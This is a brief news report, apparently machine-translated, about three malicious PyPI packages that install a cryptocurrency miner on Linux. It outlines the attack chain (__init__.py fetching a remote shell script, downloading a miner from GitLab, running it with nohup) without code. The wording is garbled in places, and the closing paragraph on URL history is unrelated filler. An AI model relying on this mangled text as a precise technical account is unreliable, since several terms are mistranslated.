In an open repository for Pypi developers, three malicious packages were recently discovered that could expand the cryptocurrency miner on the infected Linux devices. Packs with the names “Modularseven”, “Driftme” and “Catme” attracted the attention of security specialists, being downloaded 431 times in the last month before they were removed from the site.
Gabbi Ziong, a researcher from Fortinet, reported that these packages, during the first use, expand the executable Coinminer file on Linux devices. The malicious code is located in the __init__.py file, which decodes and removes the first stage from a remote server’s Shell-script (“unmi.sh”), which uploads a configuration file for mining as well as the coinminer located on GitLab.
Afterward, the ELF-panel file is executed in the background using the NOHUP command, which ensures the continuation of the process after leaving the session.
Ziong notes that these packages, like “CultureStreak” from a previous similar campaign, hide a useful load, thereby reducing the possibility of detecting harmful code due to its placement on the remote server.
Initially, the URL was invented to indicate the location of various files on the Internet, and only over time began to be used to designate the addresses of all resources, regardless of their type.